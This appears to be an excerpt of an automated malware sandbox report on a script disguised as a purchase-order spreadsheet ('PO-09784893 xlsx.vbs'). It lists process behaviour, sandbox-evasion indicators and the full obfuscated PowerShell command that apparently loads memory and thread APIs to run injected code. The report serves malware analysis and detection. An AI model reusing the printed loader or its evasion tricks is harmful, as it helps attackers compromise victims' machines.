Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Potential evasive VBS script found (use of timer() function in loop)
Source: Initial fileInitial file: do while timer-temp<sec
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8552Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4424Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.dllJump to dropped file
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000003.00000002.848528611.0000000004E65000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
Source: powershell.exe, 00000003.00000002.848528611.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ek:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: PO-09784893 xlsx.vbsBinary or memory string: Vi5 = Vi5 & "PfHgv1gZ0V47ceC/XXOMbhGfSDCj6sDBrf5"
Source: wscript.exe, 00000000.00000003.310056094.0000023F74611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.311867684.0000023F74614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $gv2vrlqbBKC7P5QEMU7i3QMPR0oRCnNDQXznLUTAHANDLEX?lt?
Source: wscript.exe, 00000000.00000003.309917173.0000023F746D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #PfHgv1gZ0V47ceC/XXOMbhGfSDCj6sDBrf51i
Source: PO-09784893 xlsx.vbsBinary or memory string: Vi5 = Vi5 & "gv2vrlqbBKC7P5QEMU7i3QMPR0oRCnNDQXzn"
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ek:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$saudiarabiske = """koaeldmedpo-cetphysuplneph eg-frtfoycepspegrdteefafsairenspipltseiufoslnra je'drublsliiminingax ajsmoyteszatinenemug;spulesunisonungmu trspoyelsinthaekomtr.svrkiuhenhategisimkaesh.moicanpitoxeterstofeptesareefrskvfoishcgaebesfo;fopkoubabselstihoclv masafttrarutseibecad mecvelsaaxysausbr ostsehliwbuakorhutabnbeebesbusun1ce sa{tr[madanlomlspivemarpsuoseruttfr(st`"""peaundoovedastpunifo3nd2la.cudgelrulci`"""cl)bl]brpasuvibbolisiudcwa unsbetsuaimtafifucbi haeslxtotboetjrsunkt reivinsottu spgreeaftudsovelarudvcoivactieskkstesaycininawempreta(noinongrtco omnanotaymoicaspllma,griapnintal alssellagsptsm6pe9fo,biiurnbetpi kraisffifliainlpo,maibenmottr asbteagaglaany)ma;sc[sodchldelngigommiptiovarkutpa(sa`"""skgwhdboise3vi2pe`"""sn)ka]bepkrurabkllibifecsl fosbetadaartgrihvcem drehaxsatseeasrbrnda aaiafnlotov begnaesothjcamlrgibupsarmagconre(skibanrathe komekutalla,stiauncetet trgmagpyeunganufi)wo;ub[ubdcalexlstiromcipreocardyttr(se`"""cakdiesarsenplemalbi3tr2si`"""tr)be]jopbruyabsolauilacdi disljtskaemttuiovcbe aterexsttdreatrfonwe fliunnpattapsttverar saepinlsumemunshayabsdotasetumspldroadcvoasllstedksbawsa(rausviopnaltko mevpe1du,moiunnheter plvsn2ta)du;he[cadfolgylraiecmarpanobrrqutfe(li`"""sykbaeskravnkaemilsk3mo2de`"""di)fa]prpcoubebanlafihycun alshjthyadrtmiiuncpi ceestxkytkaealrkonac ariblncatse hugsilpsosebefapllemdmaesalheesatbreprasmtguofimun(puiaenfotdr teptrrtlede1to5sa1co)sk;ha[badevleultridemhopsaofarnottr(ca`"""akgpidplifi3sc2re`"""aa)da]sapekuapbtalreihacpr nosoptsrasktstisqcak eneaaxsptfoetardensp arisenovtbe flsfotenrunoaeksheboablntadpafgeisolanlblposaavtunhpr(diiddnartkl acekrtluhwiyunlhj8bl7du)bi;qu[nodkrlunlekiapmempsyoinrgltcy(sa`"""seumospeeafrpa3bl2in`"""ko)un]jrpdiurebsklnoisncsc spsfutstasetfaiklcme ueedexudtcoeunrjanst ininonfltrh grcinlskoinsbiepycdalsuimopetbenotaatarbedpa(ku)un;yn[chdagllrloticamcopsaoghrmatba(sp`"""pawtriarnresgapdeoanosplti.brdexrobvsp`"""un)dr]oppheuinbunlceicocst unssetceafotdiistcme stepaxwatlaebrrrenov paistncotru plsencluhteenodtrutaldaedrjmaoprbtr(beitynoltkl knufanafokovcoestrel2br2kl6re,ininonretko piamikwetstiwa)mu;dd[afdunlsllspivomrepnootrrchtol(cy`"""geaandprvegalipseifo3sp2re.rydovlajlre`"""do)st]typnaurabmelpoilocbu plsfitmiapatscipecta diestxbotdrehurmenal mlifanbltci trqmoufaeerraryvoshaekorkrvtsileckuefacudoafnprfliisughe(muifonpitho prrtheengofleseatrfi,liiinngrtfu opcenogasac0ti,baiminsttsh grddrispsdepreoovssu,coirintatin nonpearupunhleoer2ho7no)mo;un[indhalafluviafmcoppaospruntto(co`"""irwalisknmisovppeonooaalre.sldmorklvfo`"""st)se]copfoucrbbilopiskcsk kasovtblaantfriomcma unesuxenttrelyrdenbe veifonritca hadciouncgruremdremunwetsepfirslolippaevkrputiniteeensve(boiaanlitwo wifuvotarbesat,foivennitsa grlsuanonusgsorbeesi,foiyunmitou stsobkrerheisevtv,frigantetto buhghekamex,waialnantan messearhmerbduagrftu,seislnuntex morreesitspiau)fr;dr[whdamlrelku
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$saudiarabiske = """koaeldmedpo-cetphysuplneph eg-frtfoycepspegrdteefafsairenspipltseiufoslnra je'drublsliiminingax ajsmoyteszatinenemug;spulesunisonungmu trspoyelsinthaekomtr.svrkiuhenhategisimkaesh.moicanpitoxeterstofeptesareefrskvfoishcgaebesfo;fopkoubabselstihoclv masafttrarutseibecad mecvelsaaxysausbr ostsehliwbuakorhutabnbeebesbusun1ce sa{tr[madanlomlspivemarpsuoseruttfr(st`"""peaundoovedastpunifo3nd2la.cudgelrulci`"""cl)bl]brpasuvibbolisiudcwa unsbetsuaimtafifucbi haeslxtotboetjrsunkt reivinsottu spgreeaftudsovelarudvcoivactieskkstesaycininawempreta(noinongrtco omnanotaymoicaspllma,griapnintal alssellagsptsm6pe9fo,biiurnbetpi kraisffifliainlpo,maibenmottr asbteagaglaany)ma;sc[sodchldelngigommiptiovarkutpa(sa`"""skgwhdboise3vi2pe`"""sn)ka]bepkrurabkllibifecsl fosbetadaartgrihvcem drehaxsatseeasrbrnda aaiafnlotov begnaesothjcamlrgibupsarmagconre(skibanrathe komekutalla,stiauncetet trgmagpyeunganufi)wo;ub[ubdcalexlstiromcipreocardyttr(se`"""cakdiesarsenplemalbi3tr2si`"""tr)be]jopbruyabsolauilacdi disljtskaemttuiovcbe aterexsttdreatrfonwe fliunnpattapsttverar saepinlsumemunshayabsdotasetumspldroadcvoasllstedksbawsa(rausviopnaltko mevpe1du,moiunnheter plvsn2ta)du;he[cadfolgylraiecmarpanobrrqutfe(li`"""sykbaeskravnkaemilsk3mo2de`"""di)fa]prpcoubebanlafihycun alshjthyadrtmiiuncpi ceestxkytkaealrkonac ariblncatse hugsilpsosebefapllemdmaesalheesatbreprasmtguofimun(puiaenfotdr teptrrtlede1to5sa1co)sk;ha[badevleultridemhopsaofarnottr(ca`"""akgpidplifi3sc2re`"""aa)da]sapekuapbtalreihacpr nosoptsrasktstisqcak eneaaxsptfoetardensp arisenovtbe flsfotenrunoaeksheboablntadpafgeisolanlblposaavtunhpr(diiddnartkl acekrtluhwiyunlhj8bl7du)bi;qu[nodkrlunlekiapmempsyoinrgltcy(sa`"""seumospeeafrpa3bl2in`"""ko)un]jrpdiurebsklnoisncsc spsfutstasetfaiklcme ueedexudtcoeunrjanst ininonfltrh grcinlskoinsbiepycdalsuimopetbenotaatarbedpa(ku)un;yn[chdagllrloticamcopsaoghrmatba(sp`"""pawtriarnresgapdeoanosplti.brdexrobvsp`"""un)dr]oppheuinbunlceicocst unssetceafotdiistcme stepaxwatlaebrrrenov paistncotru plsencluhteenodtrutaldaedrjmaoprbtr(beitynoltkl knufanafokovcoestrel2br2kl6re,ininonretko piamikwetstiwa)mu;dd[afdunlsllspivomrepnootrrchtol(cy`"""geaandprvegalipseifo3sp2re.rydovlajlre`"""do)st]typnaurabmelpoilocbu plsfitmiapatscipecta diestxbotdrehurmenal mlifanbltci trqmoufaeerraryvoshaekorkrvtsileckuefacudoafnprfliisughe(muifonpitho prrtheengofleseatrfi,liiinngrtfu opcenogasac0ti,baiminsttsh grddrispsdepreoovssu,coirintatin nonpearupunhleoer2ho7no)mo;un[indhalafluviafmcoppaospruntto(co`"""irwalisknmisovppeonooaalre.sldmorklvfo`"""st)se]copfoucrbbilopiskcsk kasovtblaantfriomcma unesuxenttrelyrdenbe veifonritca hadciouncgruremdremunwetsepfirslolippaevkrputiniteeensve(boiaanlitwo wifuvotarbesat,foivennitsa grlsuanonusgsorbeesi,foiyunmitou stsobkrerheisevtv,frigantetto buhghekamex,waialnantan messearhmerbduagrftu,seislnuntex morreesitspiau)fr;dr[whdamlrelkuJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\WindowsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelkuJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdlineJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
